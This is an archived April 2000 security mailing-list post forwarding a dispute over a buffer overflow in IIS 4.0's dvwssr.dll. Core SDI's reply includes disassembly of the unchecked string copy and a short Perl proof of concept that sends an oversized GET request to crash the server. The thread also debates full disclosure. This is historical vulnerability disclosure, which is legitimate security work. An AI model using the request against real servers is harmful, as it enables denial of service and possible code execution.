Vulnerability Development mailing list archives

Re: Has anyone verified whether is is valid?

From: qztf7k () MYREALBOX COM (Hugo Gayosso)
Date: Fri, 14 Apr 2000 21:18:26 -0400


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

M J <lurker () ITIS COM> writes:

Friday's top stories
Microsoft admits security flaw
By CBS MarketWatch
Last Update: 9:07 AM ET Apr 14, 2000

[...]

There was a lot of mails in NTBUGTRAQ and BUGTRAQ, see if you can get
to the archives, or I can forward the mails here. Basically:

<from NTBUGTRAQ>
From: Russ <Russ.Cooper () RC ON CA>
Subject:      Re: DVWSSR.dll Vulnerability in Microsoft IIS 4.0 Web Servers
To: NTBUGTRAQ () LISTSERV NTBUGTRAQ COM
Date:         Fri, 14 Apr 2000 15:32:52 -0400
Reply-To: Russ <Russ.Cooper () RC ON CA>

Ok, here's a breaking update.

Latest reports say that there is

NO VULNERABILITY IN DVWSSR.DLL

Yup, that's right, different again from what I said earlier, and even more
different than what I said yesterday to WSJ.

Please accept that I have followed the story published elsewhere and tried
to keep you abreast of everything I knew. Also appreciate that the amount of
time given to verify and research the claims made by others has been
extremely short. I've had probably 30 interviews today by orgs pressing for
information on the story as the feeding frenzy occurs after the first one
goes to press (WSJ in this case).
.
.
.
.

</from NTBUGTRAQ>

on the other hand, we have:

<from BUGTRAQ>
From: Gerardo Richarte <core.lists.bugtraq () CORE-SDI COM>
Subject:      DVWSSR.dll Buffer Overflow Vulnerability in Microsoft IIS 4.0 Web
              Servers
To: BUGTRAQ () SECURITYFOCUS COM
Date:         Fri, 14 Apr 2000 20:40:48 -0300
Reply-To: Gerardo Richarte <core.lists.bugtraq () CORE-SDI COM>
Organization: Core-SDI, Buenos Aires, Argentina

Russ wrote (in ntbugtraq):

Ok, here's a breaking update.

Latest reports say that there is

NO VULNERABILITY IN DVWSSR.DLL

Yup, that's right, different again from what I said earlier, and even more
different than what I said yesterday to WSJ.


  That is not correct.

We have been playing with dvwssr.dll and we've found a buffer overflow that stops the server from incoming connections, 
at least.

The code where the buffer overflow resides is:

 mov     eax, [edi+TEXTENSION_CONTROL_BLOCK.lpszQueryString]
 test    eax, eax
 jz      _text_581813FD
 push    eax
 lea     eax, [esp+14h+queryStringCoph]
 push    eax
 call    ds:lstrcpyA           ;see here MS ENGINEERS:  BUFFER OVERFLOW
 test    eax, eax
 jz      _text_581813FD
 lea     eax, [esp+10h+queryStringCoph]
 push    eax
 call    unescape_url

So, below is an example of how to exploit this vulnerability:
Of course, having the source code makes it harder to find
 this types of bugs...

#!/usr/bin/perl
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1\nHost: yourhost\n\n";

    We've been playing a little more  trying to exploit this buffer overflow, and as we don't
have InterDevs installed on our IIS, we copied the .dll to /msadc directory, and with
this configuration, we have been able to make the code jump to our buffer.
Under this circunstances, the actual BO allow to execute arbitrary code in the target machine.
It's interesting to note that no log is generated as efect of this attack.

MS have had people working on this thing like madmen, trying to verify the
claims and investigate all of the possible pieces of code that may be
affected. As that research progressed, different observations were made and
so the story came out in various stages (with varying levels of
"correctness"). Had they been given a reasonable amount of time to respond,
nobody would have been in a tizzy about anything (i.e. the press would not
have cared to run this story anywhere).

Decide for yourself whether we were better served by (more) immediate
disclosure or not. I've stood where I stand for a reason, despite the
loathing of others for my stance...


well, aparently full disclosure does serve a purpose, we only started looking at
the DLL AFTER the post to ntbugtraq, if that didnt happend we wouldnt direct
our attention to that particular DLL.
 In your own word "decide for yourself whether...."

    richie & beto for Core SDI

- --
A390 1BBA 2C58 D679 5A71 - 86F9 404F 4B53 3944 C2D0
Investigacion y Desarrollo - CoreLabs - Core SDI
http://www.core-sdi.com

</from BUGTRAQ>

Greetings,
- --
Hugo Gayosso
Support the Free Software
Support the GNU Project
http://www.gnu.org
http://hgayosso.linuxave.net

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.1 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE498NiMNObVRBZveYRAtOhAJ47fmD9zxr2teSooD4b68Wsi6LRxQCfaELQ
RaqVHUyIhpSP9kVZGn8whJw=
=ZCvK
-----END PGP SIGNATURE-----

Current thread:

Has anyone verified whether is is valid? M J (Apr 14)
- Re: Has anyone verified whether is is valid? Joe (Apr 14)
- Re: Has anyone verified whether is is valid? Ron DuFresne (Apr 14)
- Re: Has anyone verified whether is is valid? Ryan Permeh (Apr 14)
- Re: Has anyone verified whether is is valid? Maxime Rousseau (Apr 14)
- <Possible follow-ups>
- Re: Has anyone verified whether is is valid? Hugo Gayosso (Apr 14)
- Re: Has anyone verified whether is is valid? Marc (Apr 14)
  - Re: dvwssr.dll (Has anyone verified whether is is valid?) Blue Boar (Apr 14)
    - Re: dvwssr.dll (Has anyone verified whether is is valid?) Marc (Apr 14)
    - Re: dvwssr.dll (Has anyone verified whether is is valid?) Blue Boar (Apr 15)
    - Re: dvwssr.dll (Has anyone verified whether is is valid?) Marc (Apr 15)
    - Oulook password Hap2782 (Apr 15)
    - Re: Oulook password Blue Boar (Apr 15)
    - [Fwd: R: Oulook password] Blue Boar (Apr 15)